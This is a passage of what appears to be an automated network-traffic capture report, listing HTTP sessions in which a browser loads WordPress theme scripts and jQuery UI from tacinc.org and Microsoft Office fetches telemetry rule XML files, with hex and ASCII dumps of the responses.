                                                                                                                                                                                                                              Age: 614821
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5e4fc8728e6-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC877INData Raw: 35 32 31 66 0d 0a 2f 2a 2a 68 61 6e 64 6c 65 73 3a 74 68 65 6d 65 2d 73 63 72 69 70 74 2c 65 63 73 5f 61 6a 61 78 5f 6c 6f 61 64 2c 73 6d 75 73 68 2d 6c 61 7a 79 2d 6c 6f 61 64 2c 6a 65 74 70 61 63 6b 2d 73 74 61 74 73 2c 65 63 73 2d 73 63 72 69 70 74 2a 2a 2f 0d 0a 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 2c 66 75 6e 63 74 69 6f 6e 28 73 29 7b 73 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2e 6d 61 74 63 68 28 2f 28 69 70 68 6f 6e 65 7c 69 70 6f 64 7c 61 6e 64 72 6f 69 64 7c 69 65 6d 6f 62 69 6c 65 29 2f 29 3b 76 61 72 20 65 3d 73 28 22 23 73 66 2d 6f
                                                                                                                                                                                                                              Data Ascii: 521f/**handles:theme-script,ecs_ajax_load,smush-lazy-load,jetpack-stats,ecs-script**/jQuery(document).ready(function(){}),function(s){s(document).ready(function(){navigator.userAgent.toLowerCase().match(/(iphone|ipod|android|iemobile)/);var e=s("#sf-o
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC1369INData Raw: 6a 65 63 74 2d 6d 65 22 29 2c 53 56 47 49 6e 6a 65 63 74 6f 72 28 61 2c 7b 7d 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 7d 29 29 2c 73 28 22 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 74 61 62 73 22 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 24 74 68 69 73 4d 65 6e 75 3d 73 28 74 68 69 73 29 2e 66 69 6e 64 28 22 2e 65 6c 65 6d 65 6e 74 6f 72 2d 74 61 62 73 2d 77 72 61 70 70 65 72 22 29 2c 73 28 74 68 69 73 29 2e 63 73 73 28 22 6d 69 6e 2d 68 65 69 67 68 74 22 2c 24 74 68 69 73 4d 65 6e 75 2e 68 65 69 67 68 74 28 29 2b 36 30 29 7d 29 2c 73 28 22 2e 62 67 2d 62 6c 75 65 2d 68 65 72 6f 5f 5f 74 6f 67 67 6c 65 22 29 2e 63 6c 69 63 6b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 73 28 22 2e 62 67 2d 62 6c 75 65 2d 68 65 72 6f 5f 5f 68 69 64 64 65 6e
                                                                                                                                                                                                                              Data Ascii: ject-me"),SVGInjector(a,{},function(e){})),s(".elementor-widget-tabs").each(function(){$thisMenu=s(this).find(".elementor-tabs-wrapper"),s(this).css("min-height",$thisMenu.height()+60)}),s(".bg-blue-hero__toggle").click(function(){s(".bg-blue-hero__hidden
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC1369INData Raw: 22 2f 61 62 6f 75 74 2f 73 74 61 66 66 2d 61 66 66 69 6c 69 61 74 65 73 2d 62 6f 61 72 64 2f 22 5d 27 29 2e 70 72 6f 70 28 22 68 72 65 66 22 2c 22 2f 61 62 6f 75 74 2f 73 74 61 66 66 2d 61 66 66 69 6c 69 61 74 65 73 2d 62 6f 61 72 64 2f 23 70 70 2d 61 64 76 61 6e 63 65 64 2d 74 61 62 73 2d 74 69 74 6c 65 2d 31 36 38 33 22 29 3a 22 61 66 66 69 6c 69 61 74 65 22 3d 3d 61 26 26 73 28 27 61 5b 68 72 65 66 3d 22 2f 61 62 6f 75 74 2f 73 74 61 66 66 2d 61 66 66 69 6c 69 61 74 65 73 2d 62 6f 61 72 64 2f 22 5d 27 29 2e 70 72 6f 70 28 22 68 72 65 66 22 2c 22 2f 61 62 6f 75 74 2f 73 74 61 66 66 2d 61 66 66 69 6c 69 61 74 65 73 2d 62 6f 61 72 64 2f 23 70 70 2d 61 64 76 61 6e 63 65 64 2d 74 61 62 73 2d 74 69 74 6c 65 2d 31 36 38 32 22 29 29 2c 73 28 22 23 6d 61 69 6e
                                                                                                                                                                                                                              Data Ascii: "/about/staff-affiliates-board/"]').prop("href","/about/staff-affiliates-board/#pp-advanced-tabs-title-1683"):"affiliate"==a&&s('a[href="/about/staff-affiliates-board/"]').prop("href","/about/staff-affiliates-board/#pp-advanced-tabs-title-1682")),s("#main
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC1369INData Raw: 29 2c 73 65 74 74 69 6e 67 73 3d 77 69 64 67 65 74 2e 61 74 74 72 28 22 64 61 74 61 2d 73 65 74 74 69 6e 67 73 22 29 2c 61 72 67 73 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 73 65 74 74 69 6e 67 73 29 2c 70 6f 73 74 73 3d 6a 51 75 65 72 79 28 22 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 5b 64 61 74 61 2d 69 64 3d 27 22 2b 61 72 67 73 2e 77 69 64 67 65 74 5f 69 64 2b 22 27 5d 20 2e 65 63 73 2d 70 6f 73 74 73 22 29 2c 22 6c 6f 61 64 6d 6f 72 65 22 3d 3d 61 72 67 73 2e 6c 6f 61 64 5f 6d 65 74 68 6f 64 26 26 28 62 75 74 74 6f 6e 5f 74 65 78 74 3d 6a 51 75 65 72 79 28 22 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 5b 64 61 74 61 2d 69 64 3d 27 22 2b 61 72 67 73 2e 77 69 64 67 65 74 5f 69 64 2b 22 27 5d 20 2e 65 63 73 2d 6c 6f 61 64 2d 6d 6f 72
                                                                                                                                                                                                                              Data Ascii: ),settings=widget.attr("data-settings"),args=JSON.parse(settings),posts=jQuery(".elementor-element[data-id='"+args.widget_id+"'] .ecs-posts"),"loadmore"==args.load_method&&(button_text=jQuery(".elementor-element[data-id='"+args.widget_id+"'] .ecs-load-mor
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC1369INData Raw: 64 5f 6d 65 74 68 6f 64 26 26 61 6e 69 6d 61 74 69 6f 6e 2e 72 65 6d 6f 76 65 28 29 29 7d 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 45 6c 65 43 75 73 74 6f 6d 53 6b 69 6e 43 68 61 6e 67 65 55 72 6c 50 61 67 65 28 65 29 7b 65 2e 63 68 61 6e 67 65 5f 75 72 6c 26 26 28 72 65 67 65 78 3d 2f 5c 2f 70 61 67 65 5c 2f 5b 30 2d 39 5d 2b 5c 2f 2f 67 6d 2c 63 75 72 72 65 6e 74 75 72 6c 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2c 6e 65 77 75 72 6c 3d 63 75 72 72 65 6e 74 75 72 6c 2e 72 65 70 6c 61 63 65 28 72 65 67 65 78 2c 22 2f 22 29 2c 6e 65 77 75 72 6c 3d 6e 65 77 75 72 6c 2b 22 70 61 67 65 2f 22 2b 65 2e 63 75 72 72 65 6e 74 5f 70 61 67 65 2b 22 2f 22 2c 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 6e 65 77 75 72 6c 29 2c 68 69 73 74 6f 72 79
                                                                                                                                                                                                                              Data Ascii: d_method&&animation.remove())}})}function EleCustomSkinChangeUrlPage(e){e.change_url&&(regex=/\/page\/[0-9]+\//gm,currenturl=window.location.pathname,newurl=currenturl.replace(regex,"/"),newurl=newurl+"page/"+e.current_page+"/",console.log(newurl),history
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC1369INData Raw: 7c 21 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 29 72 65 74 75 72 6e 7b 69 6e 69 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 63 66 67 3a 69 2c 6e 6f 53 75 70 70 6f 72 74 3a 21 30 7d 3b 76 61 72 20 72 3d 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 6f 3d 65 2e 48 54 4d 4c 50 69 63 74 75 72 65 45 6c 65 6d 65 6e 74 2c 73 3d 22 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22 2c 6c 3d 22 67 65 74 41 74 74 72 69 62 75 74 65 22 2c 63 3d 65 5b 73 5d 2e 62 69 6e 64 28 65 29 2c 64 3d 65 2e 73 65 74 54 69 6d 65 6f 75 74 2c 75 3d 65 2e 72 65 71 75 65 73 74 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 7c 7c 64 2c 66 3d 65 2e 72 65 71 75 65 73 74 49 64 6c 65 43 61 6c 6c 62 61 63 6b 2c 6d 3d 2f 5e 70 69 63 74 75 72 65 24 2f 69 2c
                                                                                                                                                                                                                              Data Ascii: |!t.getElementsByClassName)return{init:function(){},cfg:i,noSupport:!0};var r=t.documentElement,o=e.HTMLPictureElement,s="addEventListener",l="getAttribute",c=e[s].bind(e),d=e.setTimeout,u=e.requestAnimationFrame||d,f=e.requestIdleCallback,m=/^picture$/i,
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC1369INData Raw: 28 74 2e 68 69 64 64 65 6e 3f 64 3a 75 29 28 43 65 29 29 29 7d 2c 41 65 2e 5f 6c 73 46 6c 75 73 68 3d 43 65 2c 41 65 29 2c 4d 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 77 28 65 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 77 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 61 70 70 6c 79 28 74 2c 6e 29 7d 29 29 7d 7d 2c 4e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 61 3d 30 2c 72 3d 69 2e 74 68 72 6f 74 74 6c 65 44 65 6c 61 79 2c 6f 3d 69 2e 72 69 63 54 69 6d 65 6f 75 74 2c 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 3d 21 31 2c 61 3d 6e 2e 6e 6f 77 28 29 2c 65 28 29 7d 2c 6c 3d 66 26 26 6f 3e 34 39 3f 66 75 6e 63 74 69
                                                                                                                                                                                                                              Data Ascii: (t.hidden?d:u)(Ce)))},Ae._lsFlush=Ce,Ae),M=function(e,t){return t?function(){w(e)}:function(){var t=this,n=arguments;w((function(){e.apply(t,n)}))}},N=function(e){var t,a=0,r=i.throttleDelay,o=i.ricTimeout,s=function(){t=!1,a=n.now(),e()},l=f&&o>49?functi
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC1369INData Raw: 28 64 3d 59 29 2c 76 7c 7c 28 76 3d 21 69 2e 65 78 70 61 6e 64 7c 7c 69 2e 65 78 70 61 6e 64 3c 31 3f 72 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 3e 35 30 30 26 26 72 2e 63 6c 69 65 6e 74 57 69 64 74 68 3e 35 30 30 3f 35 30 30 3a 33 37 30 3a 69 2e 65 78 70 61 6e 64 2c 61 2e 5f 64 65 66 45 78 3d 76 2c 79 3d 76 2a 69 2e 65 78 70 46 61 63 74 6f 72 2c 67 3d 69 2e 68 46 61 63 2c 4a 3d 6e 75 6c 6c 2c 59 3c 79 26 26 5a 3c 31 26 26 65 65 3e 32 26 26 44 3e 32 26 26 21 74 2e 68 69 64 64 65 6e 3f 28 59 3d 79 2c 65 65 3d 30 29 3a 59 3d 44 3e 31 26 26 65 65 3e 31 26 26 5a 3c 36 3f 76 3a 58 29 2c 6d 21 3d 3d 64 26 26 28 24 3d 69 6e 6e 65 72 57 69 64 74 68 2b 64 2a 67 2c 71 3d 69 6e 6e 65 72 48 65 69 67 68 74 2b 64 2c 75 3d 2d 31 2a 64 2c 6d 3d 64 29 2c 6f 3d 70 5b 6e 5d
                                                                                                                                                                                                                              Data Ascii: (d=Y),v||(v=!i.expand||i.expand<1?r.clientHeight>500&&r.clientWidth>500?500:370:i.expand,a._defEx=v,y=v*i.expFactor,g=i.hFac,J=null,Y<y&&Z<1&&ee>2&&D>2&&!t.hidden?(Y=y,ee=0):Y=D>1&&ee>1&&Z<6?v:X),m!==d&&($=innerWidth+d*g,q=innerHeight+d,u=-1*d,m=d),o=p[n]
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC1369INData Raw: 6c 61 73 73 29 2c 76 26 26 28 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 6b 29 2c 6b 3d 64 28 74 65 2c 32 35 30 30 29 2c 62 28 65 2c 6c 65 2c 21 30 29 29 2c 75 26 26 67 2e 63 61 6c 6c 28 63 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 6f 75 72 63 65 22 29 2c 64 65 29 2c 73 3f 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 73 65 74 22 2c 73 29 3a 6f 26 26 21 75 26 26 28 51 2e 74 65 73 74 28 65 2e 6e 6f 64 65 4e 61 6d 65 29 3f 63 65 28 65 2c 6f 29 3a 65 2e 73 72 63 3d 6f 29 2c 72 26 26 28 73 7c 7c 75 29 26 26 41 28 65 2c 7b 73 72 63 3a 6f 7d 29 29 2c 65 2e 5f 6c 61 7a 79 52 61 63 65 26 26 64 65 6c 65 74 65 20 65 2e 5f 6c 61 7a 79 52 61 63 65 2c 68 28 65 2c 69 2e 6c 61 7a 79 43 6c 61 73 73 29 2c 77 28 28 66 75 6e 63 74 69 6f
                                                                                                                                                                                                                              Data Ascii: lass),v&&(clearTimeout(k),k=d(te,2500),b(e,le,!0)),u&&g.call(c.getElementsByTagName("source"),de),s?e.setAttribute("srcset",s):o&&!u&&(Q.test(e.nodeName)?ce(e,o):e.src=o),r&&(s||u)&&A(e,{src:o})),e._lazyRace&&delete e._lazyRace,h(e,i.lazyClass),w((functio
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC1369INData Raw: 6e 73 65 72 74 65 64 22 2c 72 65 2c 21 30 29 2c 72 5b 73 5d 28 22 44 4f 4d 41 74 74 72 4d 6f 64 69 66 69 65 64 22 2c 72 65 2c 21 30 29 2c 73 65 74 49 6e 74 65 72 76 61 6c 28 72 65 2c 39 39 39 29 29 2c 63 28 22 68 61 73 68 63 68 61 6e 67 65 22 2c 72 65 2c 21 30 29 2c 5b 22 66 6f 63 75 73 22 2c 22 6d 6f 75 73 65 6f 76 65 72 22 2c 22 63 6c 69 63 6b 22 2c 22 6c 6f 61 64 22 2c 22 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 22 2c 22 61 6e 69 6d 61 74 69 6f 6e 65 6e 64 22 5d 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 5b 73 5d 28 65 2c 72 65 2c 21 30 29 7d 29 29 2c 2f 64 24 7c 5e 63 2f 2e 74 65 73 74 28 74 2e 72 65 61 64 79 53 74 61 74 65 29 3f 79 65 28 29 3a 28 63 28 22 6c 6f 61 64 22 2c 79 65 29 2c 74 5b 73 5d 28 22 44 4f 4d 43 6f 6e 74 65
                                                                                                                                                                                                                              Data Ascii: nserted",re,!0),r[s]("DOMAttrModified",re,!0),setInterval(re,999)),c("hashchange",re,!0),["focus","mouseover","click","load","transitionend","animationend"].forEach((function(e){t[s](e,re,!0)})),/d$|^c/.test(t.readyState)?ye():(c("load",ye),t[s]("DOMConte


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              106192.168.2.64983513.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:10 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 419
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582B9C710B28"
                                                                                                                                                                                                                              x-ms-request-id: 2653a72e-001e-005a-26e6-21c3d0000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180410Z-r1755647c669hnl7dkxy835cqc000000069000000000as6d
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              107192.168.2.64983613.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:10 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 477
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582BA54DCC28"
                                                                                                                                                                                                                              x-ms-request-id: 8ae0ddcf-601e-0002-0c50-23a786000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180410Z-17fbfdc98bbq2x5bzrteug30v80000000620000000008cb4
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              108192.168.2.649841141.193.213.104431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC651OUTGET /wp-includes/js/jquery/ui/core.min.js HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                              Referer: https://www.tacinc.org/
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:10 GMT
                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Last-Modified: Thu, 26 Sep 2024 14:01:32 GMT
                                                                                                                                                                                                                              ETag: W/"66f5693c-53d8"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 614821
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5e80e44e873-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC877INData Raw: 35 33 64 38 0d 0a 2f 2a 21 20 6a 51 75 65 72 79 20 55 49 20 2d 20 76 31 2e 31 33 2e 33 20 2d 20 32 30 32 34 2d 30 34 2d 32 36 0a 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 75 69 2e 63 6f 6d 0a 2a 20 49 6e 63 6c 75 64 65 73 3a 20 77 69 64 67 65 74 2e 6a 73 2c 20 70 6f 73 69 74 69 6f 6e 2e 6a 73 2c 20 64 61 74 61 2e 6a 73 2c 20 64 69 73 61 62 6c 65 2d 73 65 6c 65 63 74 69 6f 6e 2e 6a 73 2c 20 65 66 66 65 63 74 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 62 6c 69 6e 64 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 62 6f 75 6e 63 65 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 63 6c 69 70 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 64 72 6f 70 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65
                                                                                                                                                                                                                              Data Ascii: 53d8/*! jQuery UI - v1.13.3 - 2024-04-26* https://jqueryui.com* Includes: widget.js, position.js, data.js, disable-selection.js, effect.js, effects/effect-blind.js, effects/effect-bounce.js, effects/effect-clip.js, effects/effect-drop.js, effects/effe
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC1369INData Raw: 65 2e 6a 73 2c 20 77 69 64 67 65 74 73 2f 70 72 6f 67 72 65 73 73 62 61 72 2e 6a 73 2c 20 77 69 64 67 65 74 73 2f 72 65 73 69 7a 61 62 6c 65 2e 6a 73 2c 20 77 69 64 67 65 74 73 2f 73 65 6c 65 63 74 61 62 6c 65 2e 6a 73 2c 20 77 69 64 67 65 74 73 2f 73 65 6c 65 63 74 6d 65 6e 75 2e 6a 73 2c 20 77 69 64 67 65 74 73 2f 73 6c 69 64 65 72 2e 6a 73 2c 20 77 69 64 67 65 74 73 2f 73 6f 72 74 61 62 6c 65 2e 6a 73 2c 20 77 69 64 67 65 74 73 2f 73 70 69 6e 6e 65 72 2e 6a 73 2c 20 77 69 64 67 65 74 73 2f 74 61 62 73 2e 6a 73 2c 20 77 69 64 67 65 74 73 2f 74 6f 6f 6c 74 69 70 2e 6a 73 0a 2a 20 43 6f 70 79 72 69 67 68 74 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 3b 20 4c 69 63 65 6e 73 65
                                                                                                                                                                                                                              Data Ascii: e.js, widgets/progressbar.js, widgets/resizable.js, widgets/selectable.js, widgets/selectmenu.js, widgets/slider.js, widgets/sortable.js, widgets/spinner.js, widgets/tabs.js, widgets/tooltip.js* Copyright jQuery Foundation and other contributors; License
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC1369INData Raw: 44 65 66 61 75 6c 74 28 29 7d 29 7d 29 2c 65 6e 61 62 6c 65 53 65 6c 65 63 74 69 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6f 66 66 28 22 2e 75 69 2d 64 69 73 61 62 6c 65 53 65 6c 65 63 74 69 6f 6e 22 29 7d 7d 29 2c 0a 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 55 49 20 46 6f 63 75 73 61 62 6c 65 20 31 2e 31 33 2e 33 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 75 69 2e 63 6f 6d 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 2e 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 2e 6f 72
                                                                                                                                                                                                                              Data Ascii: Default()})}),enableSelection:function(){return this.off(".ui-disableSelection")}}),/*! * jQuery UI Focusable 1.13.3 * https://jqueryui.com * * Copyright OpenJS Foundation and other contributors * Released under the MIT license. * https://jquery.or
